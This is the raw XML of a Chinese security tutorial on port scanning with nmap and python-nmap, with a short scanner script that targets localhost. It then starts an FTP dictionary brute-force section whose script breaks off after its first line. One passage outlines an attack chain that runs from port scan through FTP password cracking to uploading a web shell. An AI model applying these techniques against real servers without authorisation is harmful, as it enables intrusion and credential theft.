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4CDBB" w14:textId="1659A7B4" w:rsidR="006A0C14" w:rsidRDefault="006A0C14" w:rsidP="00E46AC3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端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D862F" w14:textId="77777777" w:rsidR="006A0C14" w:rsidRPr="00E46AC3" w:rsidRDefault="006A0C14" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/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  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t xml:space="preserve">  IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是识别服务器的逻辑地址。端口是逻辑单位，它使得多个应用程序可以共享一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E16E7F" w14:textId="65EB1C10" w:rsidR="006A0C14" w:rsidRPr="00E46AC3" w:rsidRDefault="006A0C14" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E46AC3">
        <w:t xml:space="preserve">    IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议中的识别符，而端口是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>TCP/UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议中的识别符。为了对外提供网络服务，防火墙或服务器会主动对外开放一些端口，其中最具代表性的端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>443</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，分别用于对外提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务。此外还开放了一些端口，以方便管理，其中最具代表性的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号端口，它们分别提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务。像这样，这些为了对外提供服务而开放的端口成为黑客攻击的主要目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BE1FD4" w14:textId="2B7A5A60" w:rsidR="00030089" w:rsidRDefault="006A0C14" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描是指针对对外提供服务的服务器进行扫描，获取服务器对外开放的端口列表。虽然有多种端口扫描技术，但大致可以分为基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的端口扫描与基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的端口扫描。基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的端口扫描通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包扫描端口，而基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的端口扫描则通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:t>FIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46AC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等多种包扫描端口，探测相应端口是否开放。不同端口扫描技术具有不同性能与隐蔽性，要根据具体情况选用合适的技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE9CEF3" w14:textId="3076CD86" w:rsidR="00E46AC3" w:rsidRDefault="00163AE2" w:rsidP="00163AE2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A7B3EB" w14:textId="331F69B9" w:rsidR="00E46AC3" w:rsidRDefault="00F75E20" w:rsidP="00163AE2">
      <w:pPr>
        <w:pStyle w:val="3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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和python-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D571EA6" w14:textId="0E16FFFB" w:rsidR="00E46AC3" w:rsidRDefault="0035703E" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map可以从</w:t>
      </w:r>
      <w:r w:rsidR="0060105C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0060105C">
        <w:instrText xml:space="preserve"> HYPERLIN</w:instrText>
      </w:r>
      <w:r w:rsidR="0060105C">
        <w:instrText xml:space="preserve">K "https://nmap.org/download.html" </w:instrText>
      </w:r>
      <w:r w:rsidR="0060105C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A706CC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>https://nmap.org/download.html</w:t>
      </w:r>
      <w:r w:rsidR="0060105C">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载安装，Windows下是</w:t>
      </w:r>
      <w:r w:rsidR="007B6398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有图形界面的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B6398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D021BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D021BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D2943">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装目录</w:t>
      </w:r>
      <w:r w:rsidR="00D021BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加到环境变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54C6A0" w14:textId="402B1A14" w:rsidR="00E46AC3" w:rsidRDefault="00B62D1B" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ython-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块可以使用pip直接安装pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> install python-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50944BA1" w14:textId="77777777" w:rsidR="00357907" w:rsidRDefault="00357907" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E56B33D" w14:textId="4F064FAA" w:rsidR="00E46AC3" w:rsidRDefault="00357907" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00357907">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序安装完毕后，通过端口扫描获取可被黑客攻击的端口信息。使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00357907">
        <w:t>Nmap工具不仅可以查看开放的端口，还能获取使用相应端口的服务信息。若FTP所用的21号端口处于开放状态，则可应用密码破解技术破解密码。FTP协议不仅可以传送文件，还提供了一些用于获取目录信息的命令。使用Python应用程序，获取Web服务器（Apache)使用的目录信息。最后，向指定目录上传用于Web shell攻击的脚本，并通过浏览器运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567FC499" w14:textId="7FE0E361" w:rsidR="004B39CD" w:rsidRDefault="00163AE2" w:rsidP="00163AE2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D36E19" w14:textId="70148434" w:rsidR="004B39CD" w:rsidRDefault="00D96108" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D96108">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先了解端口扫描。从黑客</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96108">
        <w:t>PC向服务器PC发送多种协议的数据包，观察服务器PC的响应行为。该过程中，可以使用的协议有ICMP、TCP、UDP、SCTP等。Nmap中大量使用的是TCPSYN扫描技术，因为其执行速度快，而且很容易避开安全设备的探测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B04804" w14:textId="6B042C25" w:rsidR="00D96108" w:rsidRDefault="00E463AE" w:rsidP="006A0C14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1A1E730B" wp14:editId="5C2D14EE">
            <wp:extent cx="5274310" cy="25387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080B" w14:textId="6107CBD2" w:rsidR="00F61543" w:rsidRDefault="00F61543" w:rsidP="00F61543">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    黑客PC向服务器PC特定端口发送TCP</w:t>
      </w:r>
      <w:r w:rsidR="00EE4229">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SYN数据包时，若目标端口处于服务状态，则向黑客PC发送SYN/ACK数据包。若目标端口关闭，则发送RST数据包。黑客PC接收来自目标端口的SYN/ACK包后，并不建立完整连接，而向服务器PC发送RST包，然后从中间终止连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0475A243" w14:textId="60854E5C" w:rsidR="00D96108" w:rsidRDefault="00F61543" w:rsidP="00F61543">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    由于TCPSYN扫描具备这种特点，所以又称“半打开扫描”（Half-open Scanning）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72D317" w14:textId="18AD6D56" w:rsidR="00D96108" w:rsidRDefault="00EE4229" w:rsidP="006A0C14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504847FE" wp14:editId="2D09BF6B">
            <wp:extent cx="5274310" cy="17646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E78C" w14:textId="1B29C7F3" w:rsidR="004B39CD" w:rsidRDefault="00A05A91" w:rsidP="00A05A91">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5851F248" w14:textId="61C83F8C" w:rsidR="00A05A91" w:rsidRDefault="00D021BB" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D021BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D021BB">
        <w:t>TCPSYN扫描方式，从端口1到1024中检测可以使用哪些端口。Python提供了socket模块，使用它可以扫描端口，但它对无响应的端口留有一定的等待时间，所以比较耗时。而使用Nmap模块则能快速检测端口开放与否。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3AD25F" w14:textId="1DA571A9" w:rsidR="00D021BB" w:rsidRDefault="00D021BB" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F31DF83" w14:textId="77777777" w:rsidR="00B722AD" w:rsidRPr="00B722AD" w:rsidRDefault="00B722AD" w:rsidP="00B722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#!/usr/bin/python3</w:t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# -*- encoding: utf-8 -*-</w:t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# @Time     : 2020/11/24 17:13 </w:t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# @Author   : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ordar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# @File     : port_scan.py  </w:t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# @Project  : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pythonCourse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# @Python   : 3.7.5</w:t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</w:r>
      <w:r w:rsidRPr="00B722A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proofErr w:type="spellStart"/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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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创建</w:t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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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PortScanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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对象：在</w:t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Python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中创建</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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PortScanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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对象，以使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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lastRenderedPageBreak/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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。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若尚未在</w:t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PC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中安装</w:t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Nmap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程序，则会触发</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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PortScanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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异常。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nm = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nmap.PortScanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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    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运行端口扫描：接收</w:t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2~3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个参数，执行端口扫描。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    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主机：使用类似于</w:t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scanme.nmap.org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、</w:t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198.116.0-255.1-127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或</w:t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216.163.128.20/20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形式，设置主机信息。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    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端口：使用类似于</w:t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22,53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，</w:t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110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，</w:t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143-4564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的形式，设置要扫描的端口。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    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参数：使用类似于</w:t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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sU-sX-sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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的形式，设置运行</w:t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Nmap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所需选项。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proofErr w:type="spellStart"/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nm.scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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B722A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"127.0.0.1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B722A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B722A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"1-10"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获取主机列表：以列表形式返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00B722A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scan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）函数参数指定的主机信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B722A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B722A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for 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host </w:t>
      </w:r>
      <w:r w:rsidRPr="00B722A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in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nm.all_hosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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():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B722AD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B722A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"[*] Host: {}({})"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.format(host</w:t>
      </w:r>
      <w:r w:rsidRPr="00B722A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nm[host].hostname()))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B722AD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B722A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"[*] State: {}"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.format(nm[host].state()))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B722A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for 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proto </w:t>
      </w:r>
      <w:r w:rsidRPr="00B722A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in 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nm[host].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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all_protocols</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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():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B722AD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B722A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"[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B722A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Protool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B722A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: {}"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.format(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B722AD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format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(proto)))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proofErr w:type="spellStart"/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lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r w:rsidRPr="00B722AD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list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(nm[host][proto].keys())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proofErr w:type="spellStart"/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lport.sort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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B722A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for 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port </w:t>
      </w:r>
      <w:r w:rsidRPr="00B722A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in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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: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B722AD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B722A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"[*] Port:{} State: {}"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.format(port</w:t>
      </w:r>
      <w:r w:rsidRPr="00B722A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B722A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nm[host][proto][port]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06307E" w14:textId="77777777" w:rsidR="00D021BB" w:rsidRPr="00B722AD" w:rsidRDefault="00D021BB" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50AD81B6" w14:textId="46D4BD52" w:rsidR="00A05A91" w:rsidRDefault="00BE4AE7" w:rsidP="00BE4AE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD709B" w14:textId="26B0D5BF" w:rsidR="001B65D6" w:rsidRDefault="001B65D6" w:rsidP="006A0C14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6904BA9B" wp14:editId="3837A834">
            <wp:extent cx="5274310" cy="1463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51EB" w14:textId="3D8B5581" w:rsidR="00A05A91" w:rsidRDefault="00A05A91" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255C048A" w14:textId="1A44DCFF" w:rsidR="00CE3FA0" w:rsidRDefault="00CE3FA0" w:rsidP="00CE3FA0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FTP密码爆破工具</w:t>
      </w:r>
      <w:r w:rsidR="00C44E3E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05237F" w14:textId="19B08FE9" w:rsidR="00CE3FA0" w:rsidRDefault="00C44E3E" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C44E3E">
        <w:t>FTP服务后台设置中，通常不会检查密码输错次数。这样即可将wordlist.txt文件用作字典，不断尝试登录，从而猜出密码。python提供了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C44E3E">
        <w:t>ftplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C44E3E">
        <w:t>模块，该模块提供了灵活使用FTP服务的多种功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB132AB" w14:textId="648FD9CC" w:rsidR="00CE3FA0" w:rsidRDefault="00C44E3E" w:rsidP="006A0C14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7DA350C1" wp14:editId="2678E6B5">
            <wp:extent cx="5274310" cy="19729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4036" w14:textId="0E6B4284" w:rsidR="00CE3FA0" w:rsidRDefault="00D10A0A" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D10A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了测试方便，假设已知用户名。从</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10A0A">
        <w:t>wordlist.txt文件找到密码，将其复制到文件前面。如果密码位于wordlist.txt文件后面，那么程序破解密码时将会耗费很长时间。建立FTP连接时，若登录失败，则送回530User cannot log in信息，在Python程序中触发异常。若登录成功，则显示220User logged in 信息，在Python程序中不显示任何信息，输出密码并退出循环。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AA765C" w14:textId="43EDBDDA" w:rsidR="00CE3FA0" w:rsidRDefault="00843A46" w:rsidP="00843A46">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E517B3" w14:textId="08554890" w:rsidR="00843A46" w:rsidRDefault="00D53BD7" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D53BD7">
        <w:t>Python为连接与登录FTP提供了简单的机制。许多需要在Java或C语言中处理的过程已经在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D53BD7">
        <w:t>ftplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D53BD7">
        <w:t>模块内部得到处理，这样，用户只需使用import语句将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D53BD7">
        <w:t>ftplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D53BD7">
        <w:t>模块导入应用程序，即可轻松使用FTP。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAFA93" w14:textId="0AB3BC62" w:rsidR="00CE3FA0" w:rsidRDefault="00CE3FA0" w:rsidP="006A0C14">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACA41BF" w14:textId="77777777" w:rsidR="0044388C" w:rsidRPr="0044388C" w:rsidRDefault="0044388C" w:rsidP="004438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44388C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#!/usr/bin/python3</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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# -*- encoding: utf-8 -*-</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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# @Time     : 2020/11/24 17:55 </w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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# @Author   : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044388C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ordar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044388C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# @File     : ftp_brute.py  </w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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# @Project  : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044388C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pythonCourse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044388C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# @Python   : 3.7.5</w:t>
      </w:r>
      <w:r w:rsidRPr="0044388C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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ftplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t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FTP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def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044388C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get_pass</w:t>
      </w:r>
